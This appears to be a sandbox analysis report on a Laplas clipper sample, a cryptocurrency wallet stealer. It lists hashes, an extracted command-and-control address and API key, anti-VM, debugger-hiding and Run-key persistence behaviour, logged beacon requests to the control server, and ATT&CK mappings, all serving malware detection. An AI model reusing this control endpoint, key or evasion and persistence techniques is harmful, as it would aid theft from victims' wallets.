laplas | 9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999

Analysis

max time kernel
269s
max time network
291s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
20/04/2023, 22:17 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe
Size

2.7MB
MD5

20974e780438e87cf0fab2e4c10aa72a
SHA1

577e4d37c6897e550abe430d58577b595ed6d2a9
SHA256

9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999
SHA512

c40c222c127d002ea647f3a447426099c7e20f2c9cee48d60f626222e27123406f18e84a2e0774f1725dde001691525487f37e753c5c1dd026b84c958d017e61
SSDEEP

49152:izUKp+KxzGMns8LyGuD7wdwrYvihsZqkWo9pG7XnkMcfWzE65Gl9R/4xEozse:iYKpbxZDyGuDkdRiOZRd9e5KW4aGd/6N

Score

10^/10

laplas clipper evasion persistence stealer trojan

Malware Config

Extracted

Family

laplas

http://45.159.189.105

Attributes

api_key
7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e

Signatures

Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ntlhost.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe

Executes dropped EXE 1 IoCs

pid	Process
1940	ntlhost.exe

Loads dropped DLL 1 IoCs

pid	Process
1736	9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ntlhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1736	9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe
1940	ntlhost.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	1	Go-http-client/1.1

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1736 wrote to memory of 1940	1736	9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe	28
PID 1736 wrote to memory of 1940	1736	9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe	28
PID 1736 wrote to memory of 1940	1736	9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe	28

C:\Users\Admin\AppData\Local\Temp\9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe
"C:\Users\Admin\AppData\Local\Temp\9f35ecf414df4f8e3d0bfa41cea9ebf0827a271941555cabaf22530d774bd999.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1736
- C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
  C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1940

Network

GET

http://45.159.189.105/bot/regex

ntlhost.exe

Remote address:

45.159.189.105:80

Request

GET /bot/regex HTTP/1.1
Host: 45.159.189.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Thu, 20 Apr 2023 22:18:12 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin

ntlhost.exe

Remote address:

45.159.189.105:80

Request

GET /bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin HTTP/1.1
Host: 45.159.189.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Thu, 20 Apr 2023 22:18:12 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
GET

http://45.159.189.105/bot/regex

ntlhost.exe

Remote address:

45.159.189.105:80

Request

GET /bot/regex HTTP/1.1
Host: 45.159.189.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Thu, 20 Apr 2023 22:19:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin

ntlhost.exe

Remote address:

45.159.189.105:80

Request

GET /bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin HTTP/1.1
Host: 45.159.189.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Thu, 20 Apr 2023 22:19:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
GET

http://45.159.189.105/bot/regex

ntlhost.exe

Remote address:

45.159.189.105:80

Request

GET /bot/regex HTTP/1.1
Host: 45.159.189.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Thu, 20 Apr 2023 22:20:23 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin

ntlhost.exe

Remote address:

45.159.189.105:80

Request

GET /bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin HTTP/1.1
Host: 45.159.189.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Thu, 20 Apr 2023 22:20:24 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
GET

http://45.159.189.105/bot/regex

ntlhost.exe

Remote address:

45.159.189.105:80

Request

GET /bot/regex HTTP/1.1
Host: 45.159.189.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Thu, 20 Apr 2023 22:21:30 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin

ntlhost.exe

Remote address:

45.159.189.105:80

Request

GET /bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin HTTP/1.1
Host: 45.159.189.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Thu, 20 Apr 2023 22:21:30 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
GET

http://45.159.189.105/bot/regex

ntlhost.exe

Remote address:

45.159.189.105:80

Request

GET /bot/regex HTTP/1.1
Host: 45.159.189.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Thu, 20 Apr 2023 22:22:36 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin

ntlhost.exe

Remote address:

45.159.189.105:80

Request

GET /bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin HTTP/1.1
Host: 45.159.189.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Thu, 20 Apr 2023 22:22:36 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive

45.159.189.105:80

http://45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin

http

ntlhost.exe

2.6kB
6.9kB
25
29

HTTP Request

GET http://45.159.189.105/bot/regex

HTTP Response

200

HTTP Request

GET http://45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin

HTTP Response

200

HTTP Request

GET http://45.159.189.105/bot/regex

HTTP Response

200

HTTP Request

GET http://45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin

HTTP Response

200

HTTP Request

GET http://45.159.189.105/bot/regex

HTTP Response

200

HTTP Request

GET http://45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin

HTTP Response

200

HTTP Request

GET http://45.159.189.105/bot/regex

HTTP Response

200

HTTP Request

GET http://45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin

HTTP Response

200

HTTP Request

GET http://45.159.189.105/bot/regex

HTTP Response

200

HTTP Request

GET http://45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=MLXLFKOI\Admin

HTTP Response

200

No results found

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Filesize
818.7MB

MD5
cca69001bb5ad64c706a1a7481418a15

SHA1
cbeb86d886ecfb2f8f778db7da3ab12a3468612d

SHA256
6e580a16c4d175f8d9ac0b56203d3119815190248b61e3b6d8d2058fd9c160e9

SHA512
13dd241873d7b7fe23420d31dbcfd3f4a459f0ca0c1093ec642b483c0cc5a569c1bbd17a1c811d851f87c8b77a28164b6f79a64dd7ee95792224f35ee62b8f2f

Download Submit
\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Filesize
818.7MB

MD5
cca69001bb5ad64c706a1a7481418a15

SHA1
cbeb86d886ecfb2f8f778db7da3ab12a3468612d

SHA256
6e580a16c4d175f8d9ac0b56203d3119815190248b61e3b6d8d2058fd9c160e9

SHA512
13dd241873d7b7fe23420d31dbcfd3f4a459f0ca0c1093ec642b483c0cc5a569c1bbd17a1c811d851f87c8b77a28164b6f79a64dd7ee95792224f35ee62b8f2f

Download Submit
memory/1736-54-0x0000000000BD0000-0x0000000001448000-memory.dmp

Filesize
8.5MB

Download
memory/1736-55-0x0000000000BD0000-0x0000000001448000-memory.dmp

Filesize
8.5MB

Download
memory/1736-57-0x0000000000BD0000-0x0000000001448000-memory.dmp

Filesize
8.5MB

Download
memory/1736-58-0x0000000000BD0000-0x0000000001448000-memory.dmp

Filesize
8.5MB

Download
memory/1736-59-0x0000000000BD0000-0x0000000001448000-memory.dmp

Filesize
8.5MB

Download
memory/1736-60-0x0000000000BD0000-0x0000000001448000-memory.dmp

Filesize
8.5MB

Download
memory/1736-61-0x0000000000BD0000-0x0000000001448000-memory.dmp

Filesize
8.5MB

Download
memory/1736-66-0x0000000000BD0000-0x0000000001448000-memory.dmp

Filesize
8.5MB

Download
memory/1940-82-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-87-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-69-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-71-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-72-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-73-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-74-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-75-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-76-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-77-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-78-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-79-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-67-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-83-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-84-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-85-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-86-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-68-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-88-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-89-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-90-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-91-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-92-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-93-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-94-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-95-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-96-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-97-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-98-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-99-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-100-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-101-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-102-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download
memory/1940-103-0x0000000000110000-0x0000000000988000-memory.dmp

Filesize
8.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.